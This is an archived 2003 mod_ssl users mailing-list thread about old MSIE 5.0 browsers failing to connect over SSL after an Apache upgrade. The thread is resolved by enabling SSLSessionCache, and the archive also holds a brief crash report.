Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id D02E7A8934
	for ; Tue, 29 Jul 2003 11:58:49 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h6T9wFa16736
	for ; Tue, 29 Jul 2003 10:58:36 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2656.59)
	id ; Tue, 29 Jul 2003 10:58:08 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2DA1@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Problems with old MSIE 5.0
Date: Tue, 29 Jul 2003 10:58:06 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

How up to date are these versions of IE? I recall that the original IE 5.0
that shipped with Windows 2000 was quite broken with regards to SSL support
(but IE5.01 wasn't). 

The last time I looked, SP3 for Windows 2000 gave you IE5.01 SP3, but SP3
wasn't available directly (only SP2). I haven't checked the situation with
SP4 (yet).

The official line from Microsoft is that IE5.01 SP2 is no longer available,
as it is in the "extended support phase":
http://www.microsoft.com/windows/ie/support/ie51exsupport.asp

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

After over 144 years, there's still no fossil evidence of Evolution.

> -----Original Message-----
> From: Torvald Baade Bringsvor [mailto:Torvald.Bringsvor@ergo.no]
> Sent: 29 July 2003 10:26
> To: 'modssl-users@modssl.org'
> Subject: Problems with old MSIE 5.0
> 
> 
> Hello.
> 
> After upgrading to 2.0.47 we have been experiencing problems 
> with clients
> using old MSIE 5.0 browsers (40 bit versions). They are 
> suddenly unable to
> connect, and get a "The page cannot be displayed" error.
> 
> However, disabling SSLv3 "cures" the problem.
> 
> We are using glibc-2.3.2.
> 
> The MSIE version we have tried is 5.00.2614.3500, on W2K, but 
> quite a few
> clients are experiencing problemms.
> 
> Any suggestions?
> 
> -Torvald Bringsvor
> Ergo Integration AS
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 29 12:21:30 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DF30AA8959; Tue, 29 Jul 2003 12:21:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from exchange.sds.no (exchange.sds.no [139.105.2.11])
	by master.modssl.org (Postfix) with ESMTP id 2B96EA8934
	for ; Tue, 29 Jul 2003 12:21:28 +0200 (CEST)
Received: by exchange.sds.no with Internet Mail Service (5.5.2654.42)
	id <33PGKPZK>; Tue, 29 Jul 2003 12:21:23 +0200
Message-ID: 
From: Torvald Baade Bringsvor 
To: "'modssl-users@modssl.org'" 
Subject: RE: Problems with old MSIE 5.0
Date: Tue, 29 Jul 2003 12:21:19 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2654.42)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Torvald Baade Bringsvor 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I dont think theese browsers are supported, no. However, quite a few clients
are using them still and our customers does not accept us tossing our hands
in the air and saying that we dont support all browsers. It has worked in
the past, and therefore it is our problem that theese browsers are indeed
broken. We have had a similar problem with 56 bit browsers before, and had a
lot of problems convincing our customers that the browsers are broken.

-Torvald
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 29 12:28:30 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9B9B8A8959; Tue, 29 Jul 2003 12:28:30 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id EB7F6A8934
	for ; Tue, 29 Jul 2003 12:28:28 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h6TASAa18719
	for ; Tue, 29 Jul 2003 11:28:15 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2656.59)
	id ; Tue, 29 Jul 2003 11:28:05 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2DA2@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Problems with old MSIE 5.0
Date: Tue, 29 Jul 2003 11:27:57 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

That hasn't answered my question about which exact version it is. Is it SP1,
SP2, SP3 or no service pack? Those are the details that are needed to look
into this. If in fact the end user hasn't applied Microsoft's patches to
Microsoft's browser, how can that be your problem?

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

After over 144 years, there's still no fossil evidence of Evolution.
> -----Original Message-----
> From: Torvald Baade Bringsvor [mailto:Torvald.Bringsvor@ergo.no]
> Sent: 29 July 2003 11:21
> To: 'modssl-users@modssl.org'
> Subject: RE: Problems with old MSIE 5.0
> 
> 
> I dont think theese browsers are supported, no. However, 
> quite a few clients
> are using them still and our customers does not accept us 
> tossing our hands
> in the air and saying that we dont support all browsers. It 
> has worked in
> the past, and therefore it is our problem that theese 
> browsers are indeed
> broken. We have had a similar problem with 56 bit browsers 
> before, and had a
> lot of problems convincing our customers that the browsers are broken.
> 
> -Torvald
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 29 12:30:22 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BFAEEA8959; Tue, 29 Jul 2003 12:30:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail1.co.ru (mail1.co.ru [194.85.128.29])
	by master.modssl.org (Postfix) with ESMTP id 3A5A3A8934
	for ; Tue, 29 Jul 2003 12:30:21 +0200 (CEST)
Received: from mailhub.co.ru ([194.85.128.15] verified)
  by mail1.co.ru (CommuniGate Pro SMTP 4.0.6)
  with ESMTP id 31974266 for modssl-users@modssl.org; Tue, 29 Jul 2003 14:30:14 +0400
Received: from xdmitri (n2-182.adsl.co.ru [62.105.154.182])
	by mailhub.co.ru (8.12.9/8.11.0) with ESMTP id h6TAUEhq023794
	for ; Tue, 29 Jul 2003 14:30:14 +0400 (MSD)
Message-ID: <013001c355bc$ac744720$65c0a8c0@hq.local>
From: "Dmitri Dmitrienko" 
To: 
Subject: CRASH in 2.8.15
Date: Tue, 29 Jul 2003 13:43:36 +0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="koi8-r"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dmitri Dmitrienko" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I got a stable crash that happens in mod_ssl 2.8.15 + apache 1.3.28 under
windows XP platform.
Where to post all the details such as call stack and so forth ?

Dmitri.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 29 12:33:36 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 938D2A8959; Tue, 29 Jul 2003 12:33:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from exchange.sds.no (exchange.sds.no [139.105.2.11])
	by master.modssl.org (Postfix) with ESMTP id 2404BA8934
	for ; Tue, 29 Jul 2003 12:33:35 +0200 (CEST)
Received: by exchange.sds.no with Internet Mail Service (5.5.2654.42)
	id <33PGKQAY>; Tue, 29 Jul 2003 12:33:30 +0200
Message-ID: 
From: Torvald Baade Bringsvor 
To: "'modssl-users@modssl.org'" 
Subject: RE: Problems with old MSIE 5.0
Date: Tue, 29 Jul 2003 12:33:28 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2654.42)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Torvald Baade Bringsvor 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry, I misunderstood this. 

As it turns out, it is not W2k as I said in my original post, it is Win98
SE, and there is no MSIE service pack installed.


-Torvald
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 29 13:03:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0C567A8962; Tue, 29 Jul 2003 13:03:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 41E1FA8934
	for ; Tue, 29 Jul 2003 13:03:10 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h6TB2aa20831
	for ; Tue, 29 Jul 2003 12:02:56 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2656.59)
	id ; Tue, 29 Jul 2003 12:02:31 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2DA4@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Problems with old MSIE 5.0
Date: Tue, 29 Jul 2003 12:02:28 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Neither the browser or the OS is supported by Microsoft anymore,
http://support.microsoft.com/default.aspx?scid=fh;en-gb;lifewin98, with the
exception of security fixes and paid support. 

Are the users aware of this? They can upgrade to IE5.5 or 6 for free
(although I doubt that this will go down particularly well).

I don't see a great deal of point in putting resources into solving this
one, except to ask what SSLSessionCache settings are you using? These have
been known to cause problems with IE.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

After over 144 years, there's still no fossil evidence of Evolution.

> -----Original Message-----
> From: Torvald Baade Bringsvor [mailto:Torvald.Bringsvor@ergo.no]
> Sent: 29 July 2003 11:33
> To: 'modssl-users@modssl.org'
> Subject: RE: Problems with old MSIE 5.0
> 
> 
> Sorry, I misunderstood this. 
> 
> As it turns out, it is not W2k as I said in my original post, 
> it is Win98
> SE, and there is no MSIE service pack installed.
> 
> 
> -Torvald
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 29 13:04:57 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B972DA8968; Tue, 29 Jul 2003 13:04:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from neptune.rb.pirum.com (mars.pirum.com [213.232.118.254])
	by master.modssl.org (Postfix) with ESMTP id B999DA8959
	for ; Tue, 29 Jul 2003 13:04:56 +0200 (CEST)
Received: from [62.189.189.147] (helo=comice)
	by neptune.rb.pirum.com with asmtp (Exim 3.35 #1 (Debian))
	id 19hSHh-0007VO-00
	for ; Tue, 29 Jul 2003 12:04:49 +0100
Message-ID: <00cf01c355c1$40d9a3c0$3864a8c0@comice>
From: "Jeff" 
To: 
References: 
Subject: Re: Problems with old MSIE 5.0
Date: Tue, 29 Jul 2003 12:04:59 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> ----- Original Message ----- 
> From: "Torvald Baade Bringsvor" 
> To: 
> Sent: Tuesday, July 29, 2003 11:21 AM
> Subject: RE: Problems with old MSIE 5.0


> I dont think theese browsers are supported, no. However, quite a few
clients
> are using them still and our customers does not accept us tossing our
hands
> in the air and saying that we dont support all browsers. It has worked in
> the past, and therefore it is our problem that theese browsers are indeed
> broken. We have had a similar problem with 56 bit browsers before, and had
a
> lot of problems convincing our customers that the browsers are broken.

MSIE 5.0 was only available from Microsoft for a very short period - because
there were so many SECURITY issues with 5.0, MS very quickly released MSIE
5.01 - at the same time, they [mostly] fixed the broken SSL implementation.

These versions had significant security issues, AND very buggy SSL:
 5.00.2014.0216 Internet Explorer 5
 5.00.2314.1003 Internet Explorer 5 Office 2000
 5.00.2614.3500 Internet Explorer 5 Windows 98 Second Edition
 5.00.2516.1900 Internet Explorer 5 Windows 2000 Beta 3
 5.00.2919.800  Internet Explorer 5 Windows 2000 RC1
 5.00.2919.3800 Internet Explorer 5 Windows 2000 RC2

I note that you say you are using the Win98/2 version? Unusual in the
corporate environment.

The first version that works reasonably reliably with SSL is 5.00.2919.6307
which is actually IE 5.01

If your customers are still using MSIE 5.0 then you have a security
obligation to 'toss your hands in the air' and get them to move as soon as
possible. If you are aware of the issues [ and you are now 8-) ] and you
don't inform them, do you become liable? Your requirement to use SSL seems
to indicate that security might be important to your customers.

I work for an ASP that provides dynamic sites and services for banks - we
did have a bank using 5.0 attempt to use our services. When we waved the
security banner, the users PCs were upgraded to a later version of IE within
two weeks. In the meantime, they used Netscape.

If you managed to get IE5.0 working RELIABLY with SSL in the past, then you
are the first person I have ever met who makes that claim. A posting of the
httpd.conf settings that work would be valuable.

The most obvious solution to your problem is to roll-back to the working
version / configuration.


Regards
Jeff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 29 13:48:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 349F0A8959; Tue, 29 Jul 2003 13:48:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from exchange.sds.no (exchange.sds.no [139.105.2.11])
	by master.modssl.org (Postfix) with ESMTP id 9C235A8934
	for ; Tue, 29 Jul 2003 13:48:16 +0200 (CEST)
Received: by exchange.sds.no with Internet Mail Service (5.5.2654.42)
	id <33PGKRLS>; Tue, 29 Jul 2003 13:48:12 +0200
Message-ID: 
From: Torvald Baade Bringsvor 
To: "'modssl-users@modssl.org'" 
Subject: RE: Problems with old MSIE 5.0
Date: Tue, 29 Jul 2003 13:48:10 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2654.42)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Torvald Baade Bringsvor 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

It seemes that you are right that SSLSessionCache is important! I set up a
test server (with 2.0.47) and it worked when SSLSessionCache was enabled,
but didnt when it was disabled. What I will do next is to reconfigure the
production environment with SSLSessionCache enabled, and we will see if that
cured it.

Thanks!

-Torvald


-----Original Message-----
From: John.Airey@rnib.org.uk [mailto:John.Airey@rnib.org.uk]
Sent: 29. juli 2003 13:02
To: modssl-users@modssl.org
Subject: RE: Problems with old MSIE 5.0


Neither the browser or the OS is supported by Microsoft anymore,
http://support.microsoft.com/default.aspx?scid=fh;en-gb;lifewin98, with the
exception of security fixes and paid support. 

Are the users aware of this? They can upgrade to IE5.5 or 6 for free
(although I doubt that this will go down particularly well).

I don't see a great deal of point in putting resources into solving this
one, except to ask what SSLSessionCache settings are you using? These have
been known to cause problems with IE.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

After over 144 years, there's still no fossil evidence of Evolution.

> -----Original Message-----
> From: Torvald Baade Bringsvor [mailto:Torvald.Bringsvor@ergo.no]
> Sent: 29 July 2003 11:33
> To: 'modssl-users@modssl.org'
> Subject: RE: Problems with old MSIE 5.0
> 
> 
> Sorry, I misunderstood this. 
> 
> As it turns out, it is not W2k as I said in my original post, 
> it is Win98
> SE, and there is no MSIE service pack installed.
> 
> 
> -Torvald
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 29 14:05:47 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CECE3A8959; Tue, 29 Jul 2003 14:05:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 5901BA8934
	for ; Tue, 29 Jul 2003 14:05:46 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h6TC5Ca25333
	for ; Tue, 29 Jul 2003 13:05:32 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2656.59)
	id ; Tue, 29 Jul 2003 13:05:07 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2DA6@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Problems with old MSIE 5.0
Date: Tue, 29 Jul 2003 13:05:06 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I use 

SSLSessionCache         shm:logs/ssl_scache(512000)
SSLSessionCacheTimeout  300

and it works for me...

John

> -----Original Message-----
> From: Torvald Baade Bringsvor [mailto:Torvald.Bringsvor@ergo.no]
> Sent: 29 July 2003 12:48
> To: 'modssl-users@modssl.org'
> Subject: RE: Problems with old MSIE 5.0
> 
> 
> It seemes that you are right that SSLSessionCache is 
> important! I set up a
> test server (with 2.0.47) and it worked when SSLSessionCache 
> was enabled,
> but didnt when it was disabled. What I will do next is to 
> reconfigure the
> production environment with SSLSessionCache enabled, and we 
> will see if that
> cured it.
> 
> Thanks!
> 
> -Torvald
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 29 14:10:09 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1C4B6A8959; Tue, 29 Jul 2003 14:10:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from exchange.sds.no (exchange.sds.no [139.105.2.11])
	by master.modssl.org (Postfix) with ESMTP id CE1D2A8934
	for ; Tue, 29 Jul 2003 14:10:07 +0200 (CEST)
Received: by exchange.sds.no with Internet Mail Service (5.5.2654.42)
	id <33PGKRXZ>; Tue, 29 Jul 2003 14:10:03 +0200
Message-ID: 
From: Torvald Baade Bringsvor 
To: "'modssl-users@modssl.org'" 
Subject: RE: Problems with old MSIE 5.0
Date: Tue, 29 Jul 2003 14:10:02 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2654.42)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Torvald Baade Bringsvor 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

what I tried was the default, dbm

But perhaps shm is quicker....

-Torvald


-----Original Message-----
From: John.Airey@rnib.org.uk [mailto:John.Airey@rnib.org.uk]
Sent: 29. juli 2003 14:05
To: modssl-users@modssl.org
Subject: RE: Problems with old MSIE 5.0


I use 

SSLSessionCache         shm:logs/ssl_scache(512000)
SSLSessionCacheTimeout  300

and it works for me...

John

> -----Original Message-----
> From: Torvald Baade Bringsvor [mailto:Torvald.Bringsvor@ergo.no]
> Sent: 29 July 2003 12:48
> To: 'modssl-users@modssl.org'
> Subject: RE: Problems with old MSIE 5.0
> 
> 
> It seemes that you are right that SSLSessionCache is 
> important! I set up a
> test server (with 2.0.47) and it worked when SSLSessionCache 
> was enabled,
> but didnt when it was disabled. What I will do next is to 
> reconfigure the
> production environment with SSLSessionCache enabled, and we 
> will see if that
> cured it.
> 
> Thanks!
> 
> -Torvald
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 31 06:13:20 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2DAC9A8963; Thu, 31 Jul 2003 06:13:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cwb.pacific.net.hk (cwb.pacific.net.hk [202.14.67.92])
	by master.modssl.org (Postfix) with ESMTP id 7A1D1A8934
	for ; Thu, 31 Jul 2003 06:13:18 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by cwb.pacific.net.hk with SMTP
        id h6V4DDRH001448 for ; Thu, 31 Jul 2003 12:13:13 +0800 (CST)
Message-ID: <00ea01c35718$e22c6de0$0200a8c0@com>
From: "Arthur Chan" 
To: 
Subject: test subscription - don't reply
Date: Thu, 31 Jul 2003 00:04:47 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
